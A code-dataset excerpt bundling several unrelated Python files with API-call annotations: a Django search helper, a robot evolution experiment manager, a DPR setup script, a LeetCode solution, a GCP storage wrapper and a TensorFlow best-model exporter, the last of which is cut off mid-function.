repo_name
stringlengths
7
94
repo_path
stringlengths
4
237
repo_head_hexsha
stringlengths
40
40
content
stringlengths
10
680k
apis
stringlengths
2
680k
ruslan-ok/ServerApps
apart/search.py
541aa12f1933054a12f590ce78544178be374669
from django.db.models import Q from hier.search import SearchResult from .models import app_name, Apart, Meter, Bill, Service, Price def search(user, query): result = SearchResult(query) lookups = Q(name__icontains=query) | Q(addr__icontains=query) items = Apart.objects.filter(user = user.id).filter(lookups) for item in items: result.add(app_name, 'apart', item.id, None, item.name, item.addr, False) lookups = Q(info__icontains=query) items = Meter.objects.filter(apart__user = user.id).filter(lookups) for item in items: result.add(app_name, 'meter', item.id, item.reading.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y')) lookups = Q(info__icontains=query) | Q(url__icontains=query) items = Bill.objects.filter(apart__user = user.id).filter(lookups) for item in items: result.add(app_name, 'bill', item.id, item.payment.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y')) lookups = Q(name__icontains=query) | Q(abbr__icontains=query) items = Service.objects.filter(apart__user = user.id).filter(lookups) for item in items: result.add(app_name, 'service', item.id, None, item.name, item.abbr, False, item.apart.name) lookups = Q(info__icontains=query) items = Price.objects.filter(apart__user = user.id).filter(lookups) for item in items: result.add(app_name, 'price', item.id, item.start, item.name(), item.info, False, item.apart.name) return result.items
[((172, 191), 'hier.search.SearchResult', 'SearchResult', (['query'], {}), '(query)\n', (184, 191), False, 'from hier.search import SearchResult\n'), ((448, 472), 'django.db.models.Q', 'Q', ([], {'info__icontains': 'query'}), '(info__icontains=query)\n', (449, 472), False, 'from django.db.models import Q\n'), ((1301, 1325), 'django.db.models.Q', 'Q', ([], {'info__icontains': 'query'}), '(info__icontains=query)\n', (1302, 1325), False, 'from django.db.models import Q\n'), ((211, 235), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'query'}), '(name__icontains=query)\n', (212, 235), False, 'from django.db.models import Q\n'), ((238, 262), 'django.db.models.Q', 'Q', ([], {'addr__icontains': 'query'}), '(addr__icontains=query)\n', (239, 262), False, 'from django.db.models import Q\n'), ((730, 754), 'django.db.models.Q', 'Q', ([], {'info__icontains': 'query'}), '(info__icontains=query)\n', (731, 754), False, 'from django.db.models import Q\n'), ((757, 780), 'django.db.models.Q', 'Q', ([], {'url__icontains': 'query'}), '(url__icontains=query)\n', (758, 780), False, 'from django.db.models import Q\n'), ((1036, 1060), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'query'}), '(name__icontains=query)\n', (1037, 1060), False, 'from django.db.models import Q\n'), ((1063, 1087), 'django.db.models.Q', 'Q', ([], {'abbr__icontains': 'query'}), '(abbr__icontains=query)\n', (1064, 1087), False, 'from django.db.models import Q\n')]
MRebolle/Battery-Robot
pyrevolve/experiment_management.py
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
import os import shutil import numpy as np from pyrevolve.custom_logging.logger import logger import sys class ExperimentManagement: # ids of robots in the name of all types of files are always phenotype ids, and the standard for id is 'robot_ID' def __init__(self, settings): self.settings = settings manager_folder = os.path.dirname(self.settings.manager) self._experiment_folder = os.path.join(manager_folder, 'data', self.settings.experiment_name, self.settings.run) self._data_folder = os.path.join(self._experiment_folder, 'data_fullevolution') self._gen_num = 0 def create_exp_folders(self): if os.path.exists(self.experiment_folder): shutil.rmtree(self.experiment_folder) os.makedirs(self.experiment_folder) os.mkdir(self.data_folder) folders = ['genotypes', 'phenotypes', 'descriptors', 'objectives', 'fitness', 'battery', 'phenotype_images', 'failed_eval_robots'] for folder in folders: os.mkdir(os.path.join(self.data_folder, folder)) @property def experiment_folder(self): return self._experiment_folder @property def data_folder(self): return self._data_folder def export_genotype(self, individual): if self.settings.recovery_enabled: individual.export_genotype(self.data_folder) def export_phenotype(self, individual): if self.settings.export_phenotype: individual.export_phenotype(self.data_folder) def export_fitnesses(self, individuals): folder = self.data_folder for individual in individuals: individual.export_fitness(folder) def export_fitness(self, individual): folder = os.path.join(self.data_folder, 'fitness') individual.export_fitness(folder) def export_objectives(self, individual): folder = os.path.join(self.data_folder, 'objectives') individual.export_objectives(folder) def export_battery(self, individual): folder = os.path.join(self.data_folder, 'battery') individual.export_battery(folder) def export_behavior_measures(self, _id, measures): filename = os.path.join(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt') with open(filename, "w") as f: if measures is None: f.write(str(None)) else: for key, val in measures.items(): f.write(f"{key} {val}\n") def export_phenotype_images(self, dirpath, individual): individual.phenotype.render_body(os.path.join(self.experiment_folder, dirpath, f'body_{individual.phenotype.id}.png')) individual.phenotype.render_brain(os.path.join(self.experiment_folder, dirpath, f'brain_{individual.phenotype.id}.png')) def export_failed_eval_robot(self, individual): individual.genotype.export_genotype(os.path.join(self.data_folder, 'failed_eval_robots', f'genotype_{individual.phenotype.id}.txt')) individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.yaml')) individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.sdf'), conf_type='sdf') def export_snapshots(self, individuals, gen_num): self._gen_num = gen_num if self.settings.recovery_enabled: path = os.path.join(self.experiment_folder, f'selectedpop_{gen_num}') if os.path.exists(path): shutil.rmtree(path) os.mkdir(path) for ind in individuals: self.export_phenotype_images(f'selectedpop_{str(gen_num)}', ind) logger.info(f'Exported snapshot {str(gen_num)} with {str(len(individuals))} individuals') def experiment_is_new(self): if not os.path.exists(self.experiment_folder): return True path, dirs, files = next(os.walk(os.path.join(self.data_folder, 'fitness'))) if len(files) == 0: return True else: return False def read_recovery_state(self, population_size, offspring_size): snapshots = [] for r, d, f in os.walk(self.experiment_folder): for dir in d: if 'selectedpop' in dir: exported_files = len([name for name in os.listdir(os.path.join(self.experiment_folder, dir)) if os.path.isfile(os.path.join(self.experiment_folder, dir, name))]) if exported_files == (population_size * 2): # body and brain files snapshots.append(int(dir.split('_')[1])) if len(snapshots) > 0: # the latest complete snapshot last_snapshot = np.sort(snapshots)[-1] # number of robots expected until the snapshot n_robots = population_size + last_snapshot * offspring_size else: last_snapshot = -1 n_robots = 0 robot_ids = [] for r, d, f in os.walk(os.path.join(self.data_folder, 'fitness')): for file in f: robot_ids.append(int(file.split('.')[0].split('_')[-1])) last_id = np.sort(robot_ids)[-1] # if there are more robots to recover than the number expected in this snapshot if last_id > n_robots: # then recover also this partial offspring has_offspring = True else: has_offspring = False return last_snapshot, has_offspring, last_id+1 def plot_path(self, data_source: str, filename: str, file_extension=".png"): data_folder = os.path.join(self._data_folder, data_source) if not os.path.exists(data_folder): os.mkdir(data_folder) return os.path.join(data_folder, filename + str(self._gen_num) + file_extension)
[((346, 384), 'os.path.dirname', 'os.path.dirname', (['self.settings.manager'], {}), '(self.settings.manager)\n', (361, 384), False, 'import os\n'), ((419, 510), 'os.path.join', 'os.path.join', (['manager_folder', '"""data"""', 'self.settings.experiment_name', 'self.settings.run'], {}), "(manager_folder, 'data', self.settings.experiment_name, self.\n settings.run)\n", (431, 510), False, 'import os\n'), ((534, 593), 'os.path.join', 'os.path.join', (['self._experiment_folder', '"""data_fullevolution"""'], {}), "(self._experiment_folder, 'data_fullevolution')\n", (546, 593), False, 'import os\n'), ((666, 704), 'os.path.exists', 'os.path.exists', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (680, 704), False, 'import os\n'), ((764, 799), 'os.makedirs', 'os.makedirs', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (775, 799), False, 'import os\n'), ((808, 834), 'os.mkdir', 'os.mkdir', (['self.data_folder'], {}), '(self.data_folder)\n', (816, 834), False, 'import os\n'), ((1763, 1804), 'os.path.join', 'os.path.join', (['self.data_folder', '"""fitness"""'], {}), "(self.data_folder, 'fitness')\n", (1775, 1804), False, 'import os\n'), ((1910, 1954), 'os.path.join', 'os.path.join', (['self.data_folder', '"""objectives"""'], {}), "(self.data_folder, 'objectives')\n", (1922, 1954), False, 'import os\n'), ((2060, 2101), 'os.path.join', 'os.path.join', (['self.data_folder', '"""battery"""'], {}), "(self.data_folder, 'battery')\n", (2072, 2101), False, 'import os\n'), ((2219, 2292), 'os.path.join', 'os.path.join', (['self.data_folder', '"""descriptors"""', 'f"""behavior_desc_{_id}.txt"""'], {}), "(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')\n", (2231, 2292), False, 'import os\n'), ((4253, 4284), 'os.walk', 'os.walk', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (4260, 4284), False, 'import os\n'), ((5671, 5715), 'os.path.join', 'os.path.join', (['self._data_folder', 'data_source'], {}), '(self._data_folder, data_source)\n', (5683, 5715), False, 'import os\n'), ((718, 755), 'shutil.rmtree', 'shutil.rmtree', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (731, 755), False, 'import shutil\n'), ((2616, 2704), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dirpath', 'f"""body_{individual.phenotype.id}.png"""'], {}), "(self.experiment_folder, dirpath,\n f'body_{individual.phenotype.id}.png')\n", (2628, 2704), False, 'import os\n'), ((2744, 2833), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dirpath', 'f"""brain_{individual.phenotype.id}.png"""'], {}), "(self.experiment_folder, dirpath,\n f'brain_{individual.phenotype.id}.png')\n", (2756, 2833), False, 'import os\n'), ((2928, 3027), 'os.path.join', 'os.path.join', (['self.data_folder', '"""failed_eval_robots"""', 'f"""genotype_{individual.phenotype.id}.txt"""'], {}), "(self.data_folder, 'failed_eval_robots',\n f'genotype_{individual.phenotype.id}.txt')\n", (2940, 3027), False, 'import os\n'), ((3064, 3165), 'os.path.join', 'os.path.join', (['self.data_folder', '"""failed_eval_robots"""', 'f"""phenotype_{individual.phenotype.id}.yaml"""'], {}), "(self.data_folder, 'failed_eval_robots',\n f'phenotype_{individual.phenotype.id}.yaml')\n", (3076, 3165), False, 'import os\n'), ((3202, 3302), 'os.path.join', 'os.path.join', (['self.data_folder', '"""failed_eval_robots"""', 'f"""phenotype_{individual.phenotype.id}.sdf"""'], {}), "(self.data_folder, 'failed_eval_robots',\n f'phenotype_{individual.phenotype.id}.sdf')\n", (3214, 3302), False, 'import os\n'), ((3466, 3528), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'f"""selectedpop_{gen_num}"""'], {}), "(self.experiment_folder, f'selectedpop_{gen_num}')\n", (3478, 3528), False, 'import os\n'), ((3544, 3564), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (3558, 3564), False, 'import os\n'), ((3614, 3628), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (3622, 3628), False, 'import os\n'), ((3897, 3935), 'os.path.exists', 'os.path.exists', (['self.experiment_folder'], {}), '(self.experiment_folder)\n', (3911, 3935), False, 'import os\n'), ((5070, 5111), 'os.path.join', 'os.path.join', (['self.data_folder', '"""fitness"""'], {}), "(self.data_folder, 'fitness')\n", (5082, 5111), False, 'import os\n'), ((5232, 5250), 'numpy.sort', 'np.sort', (['robot_ids'], {}), '(robot_ids)\n', (5239, 5250), True, 'import numpy as np\n'), ((5731, 5758), 'os.path.exists', 'os.path.exists', (['data_folder'], {}), '(data_folder)\n', (5745, 5758), False, 'import os\n'), ((5772, 5793), 'os.mkdir', 'os.mkdir', (['data_folder'], {}), '(data_folder)\n', (5780, 5793), False, 'import os\n'), ((1046, 1084), 'os.path.join', 'os.path.join', (['self.data_folder', 'folder'], {}), '(self.data_folder, folder)\n', (1058, 1084), False, 'import os\n'), ((3582, 3601), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (3595, 3601), False, 'import shutil\n'), ((4002, 4043), 'os.path.join', 'os.path.join', (['self.data_folder', '"""fitness"""'], {}), "(self.data_folder, 'fitness')\n", (4014, 4043), False, 'import os\n'), ((4790, 4808), 'numpy.sort', 'np.sort', (['snapshots'], {}), '(snapshots)\n', (4797, 4808), True, 'import numpy as np\n'), ((4423, 4464), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dir'], {}), '(self.experiment_folder, dir)\n', (4435, 4464), False, 'import os\n'), ((4484, 4531), 'os.path.join', 'os.path.join', (['self.experiment_folder', 'dir', 'name'], {}), '(self.experiment_folder, dir, name)\n', (4496, 4531), False, 'import os\n')]
nudglabs/books-python-wrappers
books/model/Instrumentation.py
8844eca8fe681542644a70749b72a6dc4e48c171
#$Id$ class Instrumentation: """This class is used tocreate object for instrumentation.""" def __init__(self): """Initialize parameters for Instrumentation object.""" self.query_execution_time = '' self.request_handling_time = '' self.response_write_time = '' self.page_context_write_time = '' def set_query_execution_time(self, query_execution_time): """Set query execution time. Args: query_execution_time(str): Query execution time. """ self.query_execution_time = query_execution_time def get_query_execution_time(self): """Get query execution time. Returns: str: Query execution time. """ return self.query_execution_time def set_request_handling_time(self, request_handling_time): """Set request handling time. Args: request_handling_time(str): Request handling time. """ self.request_handling_time = request_handling_time def get_request_handling_time(self): """Get request handling time. Returns: str: Request handling time. """ return self.request_handling_time def set_response_write_time(self, response_write_time): """Set response write time. Args: response_write_time(str): Response write time. """ self.response_write_time = response_write_time def get_response_write_time(self): """Get response write time. Returns: str: Response write time. """ return self.response_write_time def set_page_context_write_time(self, page_context_write_time): """Set page context write time. Args: page_context_write_time(str): Page context write time. """ self.page_context_write_time = page_context_write_time def get_page_context_write_time(self): """Get page context write time. Returns: str: Page context write time. """ return self.page_context_write_time
[]
sophiaalthammer/parm
DPR/setup.py
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from setuptools import setup with open("README.md") as f: readme = f.read() setup( name="dpr", version="0.1.0", description="Facebook AI Research Open Domain Q&A Toolkit", url="https://github.com/facebookresearch/DPR/", classifiers=[ "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3.6", "Topic :: Scientific/Engineering :: Artificial Intelligence", ], long_description=readme, long_description_content_type="text/markdown", setup_requires=[ "setuptools>=18.0", ], install_requires=[ "cython", "faiss-cpu>=1.6.1", "filelock", "numpy", "regex", "torch>=1.2.0", "transformers>=3.0.0,<3.1.0", "tqdm>=4.27", "wget", "spacy>=2.1.8", ], )
[((284, 941), 'setuptools.setup', 'setup', ([], {'name': '"""dpr"""', 'version': '"""0.1.0"""', 'description': '"""Facebook AI Research Open Domain Q&A Toolkit"""', 'url': '"""https://github.com/facebookresearch/DPR/"""', 'classifiers': "['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence']", 'long_description': 'readme', 'long_description_content_type': '"""text/markdown"""', 'setup_requires': "['setuptools>=18.0']", 'install_requires': "['cython', 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8']"}), "(name='dpr', version='0.1.0', description=\n 'Facebook AI Research Open Domain Q&A Toolkit', url=\n 'https://github.com/facebookresearch/DPR/', classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence'],\n long_description=readme, long_description_content_type='text/markdown',\n setup_requires=['setuptools>=18.0'], install_requires=['cython',\n 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8'])\n", (289, 941), False, 'from setuptools import setup\n')]
BillionsRichard/pycharmWorkspace
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
709e2681fc6d85ff52fb25717215a365f51073aa
# encoding: utf-8 """ @version: v1.0 @author: Richard @license: Apache Licence @contact: [email protected] @site: @software: PyCharm @time: 2019/9/12 20:37 """ from pprint import pprint as pp from operator import itemgetter import time from collections import OrderedDict from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85 from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86 class Solution: """ 输入:[[4,10,15,24,26], [0,9,12,20], [5,18,22,30]] 输出: [20,24] """ def smallestRange(self, nums): start_time = time.time() k = len(nums) print('k-->', k) k_tagged_merged_list = [] for i in range(k): row = nums[i] k_tagged_merged_list.extend([(e, i) for e in row]) k_tagged_merged_list.sort(key=itemgetter(0)) sort_end_time = time.time() print('sorting time:', sort_end_time - start_time) # print(k_tagged_merged_list) od = OrderedDict() min_range = None min_range_len = int(2e5) # print('min_range_len', min_range_len) tot_len = len(k_tagged_merged_list) # print('tot_len', tot_len) i = 0 while i < tot_len: this_tag = k_tagged_merged_list[i][1] cur_tag_set = od.keys() if this_tag in cur_tag_set: od.pop(this_tag) od[this_tag] = k_tagged_merged_list[i][0] tags = od.keys() # print('len_k_dque-->', len(k_dque)) # print('len_k_dque_tags-->', len(k_dque_tags)) if len(tags) == k: keys = list(od.keys()) first_v = od[keys[0]] last_v = od[keys[-1]] k_range_len = last_v - first_v if k_range_len < min_range_len: min_range_len = k_range_len min_range = first_v, last_v i += 1 print('ending main time:', time.time() - sort_end_time) return min_range if __name__ == '__main__': s = Solution() nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]] # nums = [[10], [11]] # nums = [[11,38,83, # 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]] # [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46], # [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]] nums = BIG_LIST_85 # nums = BIG_LIST_86 min_range = s.smallestRange(nums) print(min_range)
[((571, 582), 'time.time', 'time.time', ([], {}), '()\n', (580, 582), False, 'import time\n'), ((858, 869), 'time.time', 'time.time', ([], {}), '()\n', (867, 869), False, 'import time\n'), ((981, 994), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (992, 994), False, 'from collections import OrderedDict\n'), ((819, 832), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (829, 832), False, 'from operator import itemgetter\n'), ((1972, 1983), 'time.time', 'time.time', ([], {}), '()\n', (1981, 1983), False, 'import time\n')]
davidyum/Particle-Cloud-Framework
pcf/particle/gcp/storage/storage.py
f6325a60a3838f86bd73bf4071438e12f9c68f8d
from pcf.core.gcp_resource import GCPResource from pcf.core import State import logging from google.cloud import storage from google.cloud import exceptions logger = logging.getLogger(__name__) class Storage(GCPResource): """ This is the implementation of Google's storage service. """ flavor = "storage" equivalent_states = { State.running: 1, State.stopped: 0, State.terminated: 0 } UNIQUE_KEYS = ["gcp_resource.name"] def __init__(self, particle_definition): super(Storage, self).__init__(particle_definition=particle_definition, resource=storage) self.bucket_name = self.desired_state_definition["name"] self._set_unique_keys() def _set_unique_keys(self): """ Logic that sets keys from state definition that are used to uniquely identify the storage bucket """ self.unique_keys = Storage.UNIQUE_KEYS def get_status(self): """ Determines if the bucket exists Returns: status (dict) """ try: bucket = self.client.get_bucket(self.bucket_name) return bucket except exceptions.NotFound: return {"status": "missing"} def _terminate(self): """ Deletes the storage bucket Returns: response of gcp delete """ return self.client.bucket(bucket_name=self.bucket_name).delete() def _start(self): """ Creates the storage bucket Returns: response of create_bucket """ # create_definition = pcf_util.keep_and_replace_keys(self.get_desired_state_definition(), # S3Bucket.START_PARAMS) return self.client.bucket(bucket_name=self.bucket_name).create() def _stop(self): """ S3 bucket does not have a stopped state so it calls terminate. """ return self.terminate() def sync_state(self): """ Calls get status and then sets the current state. """ full_status = self.get_status() if full_status: if isinstance(full_status, self.resource.Bucket): self.state = State.running else: self.state = State.terminated self.current_state_definition = self.desired_state_definition def download_object(self, blob_name, file_obj, **kwargs): """ Downloads a file from the S3 bucket. Args: blob_name (str): Object name (Required) file_obj (str): file name for the download (Required) **kwargs: Options for boto3 get_object (optional) """ bucket = self.client.get_bucket(self.bucket_name) return self.resource.Blob(blob_name, bucket).download_file(file_obj, **kwargs) def delete_object(self, blob_name): """ Deletes an object in the storage bucket. Args: blob_name (str): Object Key name (Required) """ bucket = self.client.get_bucket(self.bucket_name) return bucket.delete_blob(blob_name) def list_objects(self, **kwargs): """ Lists all objects in the storage bucket. Args: **kwargs: Options for boto3 list_objects (optional) """ bucket = self.client.get_bucket(self.bucket_name) return list(bucket.list_blobs(**kwargs)) def put_object(self, blob_name, file_obj, **kwargs): """ Puts an object in the S3 bucket. Args: blob_name (str): Object Key name (Required) file_obj (object): the object to put into the bucket (Required) **kwargs: Options for boto3 put_object (optional) """ bucket = self.client.get_bucket(self.bucket_name) return self.resource.Blob(blob_name, bucket).upload_from_file(file_obj, **kwargs) def put_file(self, blob_name, file, **kwargs): """ Puts a file in the S3 bucket. Args: blob_name (str): Object Key name (Required) file (file): the file to put into the bucket (Required) **kwargs: Options for boto3 upload_file (optional) """ bucket = self.client.get_bucket(self.bucket_name) return self.resource.Blob(blob_name, bucket).upload_from_filename(file, **kwargs) def _update(self): """ Not Implemented """ pass def is_state_equivalent(self, state1, state2): """ Determines if states are equivalent. Uses equivalent_states defined in the S3Bucket class. Args: state1 (State): state1 (State): Returns: bool """ return Storage.equivalent_states.get(state1) == Storage.equivalent_states.get(state2)
[((167, 194), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (184, 194), False, 'import logging\n')]
CIMCB/cimcb
cimcb/utils/smooth.py
5d30f80423ed94e1068871b30e465b38d451581a
import numpy as np def smooth(a, WSZ): # a: NumPy 1-D array containing the data to be smoothed # WSZ: smoothing window size needs, which must be odd number, # as in the original MATLAB implementation if WSZ % 2 == 0: WSZ = WSZ - 1 out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ r = np.arange(1, WSZ - 1, 2) start = np.cumsum(a[:WSZ - 1])[::2] / r stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1] return np.concatenate((start, out0, stop))
[((331, 355), 'numpy.arange', 'np.arange', (['(1)', '(WSZ - 1)', '(2)'], {}), '(1, WSZ - 1, 2)\n', (340, 355), True, 'import numpy as np\n'), ((462, 497), 'numpy.concatenate', 'np.concatenate', (['(start, out0, stop)'], {}), '((start, out0, stop))\n', (476, 497), True, 'import numpy as np\n'), ((283, 306), 'numpy.ones', 'np.ones', (['WSZ'], {'dtype': 'int'}), '(WSZ, dtype=int)\n', (290, 306), True, 'import numpy as np\n'), ((368, 390), 'numpy.cumsum', 'np.cumsum', (['a[:WSZ - 1]'], {}), '(a[:WSZ - 1])\n', (377, 390), True, 'import numpy as np\n'), ((412, 434), 'numpy.cumsum', 'np.cumsum', (['a[:-WSZ:-1]'], {}), '(a[:-WSZ:-1])\n', (421, 434), True, 'import numpy as np\n')]
jmarine/ezeeai
ezeeai/core/extensions/best_exporter.py
091b4ce3bc5794c534084bff3301b15ba8a9be1a
from __future__ import absolute_import import abc import os import json import glob import shutil from tensorflow.python.estimator import gc from tensorflow.python.estimator import util from tensorflow.python.estimator.canned import metric_keys from tensorflow.python.framework import errors_impl from tensorflow.python.platform import gfile from tensorflow.python.platform import tf_logging from tensorflow.python.summary import summary_iterator from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter def _verify_compare_fn_args(compare_fn): """Verifies compare_fn arguments.""" args = set(util.fn_args(compare_fn)) if 'best_eval_result' not in args: raise ValueError( 'compare_fn (%s) must include best_eval_result argument.' % compare_fn) if 'current_eval_result' not in args: raise ValueError( 'compare_fn (%s) must include current_eval_result argument.' % compare_fn) non_valid_args = list(args - set(['best_eval_result', 'current_eval_result'])) if non_valid_args: raise ValueError('compare_fn (%s) has following not expected args: %s' % (compare_fn, non_valid_args)) def _loss_smaller(best_eval_result, current_eval_result): """Compares two evaluation results and returns true if the 2nd one is smaller. Both evaluation results should have the values for MetricKeys.LOSS, which are used for comparison. Args: best_eval_result: best eval metrics. current_eval_result: current eval metrics. Returns: True if the loss of current_eval_result is smaller; otherwise, False. Raises: ValueError: If input eval result is None or no loss is available. """ default_key = metric_keys.MetricKeys.LOSS if not best_eval_result or default_key not in best_eval_result: raise ValueError( 'best_eval_result cannot be empty or no loss is found in it.') if not current_eval_result or default_key not in current_eval_result: raise ValueError( 'current_eval_result cannot be empty or no loss is found in it.') return best_eval_result[default_key] > current_eval_result[default_key] class BestExporter(Exporter): """This class exports the serving graph and checkpoints of the best models. This class performs a model export everytime when the new model is better than any exsiting model. """ def __init__(self, name='best_exporter', serving_input_receiver_fn=None, event_file_pattern='eval/*.tfevents.*', compare_fn=_loss_smaller, assets_extra=None, as_text=False, exports_to_keep=5): """Create an `Exporter` to use with `tf.estimator.EvalSpec`. Example of creating a BestExporter for training and evluation: ```python def make_train_and_eval_fn(): # Set up feature columns. categorial_feature_a = ( tf.feature_column.categorical_column_with_hash_bucket(...)) categorial_feature_a_emb = embedding_column( categorical_column=categorial_feature_a, ...) ... # other feature columns estimator = tf.estimator.DNNClassifier( config=tf.estimator.RunConfig( model_dir='/my_model', save_summary_steps=100), feature_columns=[categorial_feature_a_emb, ...], hidden_units=[1024, 512, 256]) serving_feature_spec = tf.feature_column.make_parse_example_spec( categorial_feature_a_emb) serving_input_receiver_fn = ( tf.estimator.export.build_parsing_serving_input_receiver_fn( serving_feature_spec)) exporter = tf.estimator.BestExporter( name="best_exporter", serving_input_receiver_fn=serving_input_receiver_fn, exports_to_keep=5) train_spec = tf.estimator.TrainSpec(...) eval_spec = [tf.estimator.EvalSpec( input_fn=eval_input_fn, steps=100, exporters=exporter, start_delay_secs=0, throttle_secs=5)] return tf.estimator.DistributedTrainingSpec(estimator, train_spec, eval_spec) ``` Args: name: unique name of this `Exporter` that is going to be used in the export path. serving_input_receiver_fn: a function that takes no arguments and returns a `ServingInputReceiver`. event_file_pattern: event file name pattern relative to model_dir. If None, however, the exporter would not be preemption-safe. To bex preemption-safe, event_file_pattern should be specified. compare_fn: a function that compares two evaluation results and returns true if current evaluation result is better. Follows the signature: * Args: * `best_eval_result`: This is the evaluation result of the best model. * `current_eval_result`: This is the evaluation result of current candidate model. * Returns: True if current evaluation result is better; otherwise, False. assets_extra: An optional dict specifying how to populate the assets.extra directory within the exported SavedModel. Each key should give the destination path (including the filename) relative to the assets.extra directory. The corresponding value gives the full path of the source file to be copied. For example, the simple case of copying a single file without renaming it is specified as `{'my_asset_file.txt': '/path/to/my_asset_file.txt'}`. as_text: whether to write the SavedModel proto in text format. Defaults to `False`. exports_to_keep: Number of exports to keep. Older exports will be garbage-collected. Defaults to 5. Set to `None` to disable garbage collection. Raises: ValueError: if any arguments is invalid. """ self._compare_fn = compare_fn if self._compare_fn is None: raise ValueError('`compare_fn` must not be None.') _verify_compare_fn_args(self._compare_fn) self._saved_model_exporter = _SavedModelExporter( name, serving_input_receiver_fn, assets_extra, as_text) self._event_file_pattern = event_file_pattern self._model_dir = None self._best_eval_result = None self._exports_to_keep = exports_to_keep self._log = {} if exports_to_keep is not None and exports_to_keep <= 0: raise ValueError( '`exports_to_keep`, if provided, must be positive number') @property def name(self): return self._saved_model_exporter.name def export(self, estimator, export_path, checkpoint_path, eval_result, is_the_final_export): export_result = None if self._model_dir != estimator.model_dir and self._event_file_pattern: # Loads best metric from event files. tf_logging.info('Loading best metric from event files.') self._model_dir = estimator.model_dir full_event_file_pattern = os.path.join(self._model_dir, self._event_file_pattern) self._best_eval_result = self._get_best_eval_result( full_event_file_pattern) if os.path.isfile(os.path.join(export_path, 'export.log')): self._log = {} try: self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r')) except json.JSONDecodeError: pass if len(self._log) == 0: self._best_eval_result = None if self._best_eval_result is None or self._compare_fn( best_eval_result=self._best_eval_result, current_eval_result=eval_result): tf_logging.info('Performing best model export.') self._best_eval_result = eval_result export_result = self._saved_model_exporter.export( estimator, export_path, checkpoint_path, eval_result, is_the_final_export) export_result_path = export_result.decode("utf-8") self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()} self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"]) self._garbage_collect_exports(export_path) with open(os.path.join(export_path, 'export.log'), 'w') as fp: json.dump(self._log, fp) return export_result def _copy_checkpoint(self, checkpoint_pattern, dest_path, step): for file in glob.glob(checkpoint_pattern + '*'): shutil.copy(file, dest_path) with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp: text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step)) fp.write(text) fp.close() def _garbage_collect_exports(self, export_dir_base): """Deletes older exports, retaining only a given number of the most recent. Export subdirectories are assumed to be named with monotonically increasing integers; the most recent are taken to be those with the largest values. Args: export_dir_base: the base directory under which each export is in a versioned subdirectory. """ if self._exports_to_keep is None: return def _export_version_parser(path): # create a simple parser that pulls the export_version from the directory. filename = os.path.basename(path.path) if not (len(filename) == 10 and filename.isdigit()): return None return path._replace(export_version=int(filename)) # pylint: disable=protected-access keep_filter = gc._largest_export_versions(self._exports_to_keep) delete_filter = gc._negation(keep_filter) for p in delete_filter( gc._get_paths(export_dir_base, parser=_export_version_parser)): try: del self._log[p.path] gfile.DeleteRecursively(p.path) except errors_impl.NotFoundError as e: tf_logging.warn('Can not delete %s recursively: %s', p.path, e) # pylint: enable=protected-access def _get_best_eval_result(self, event_files): 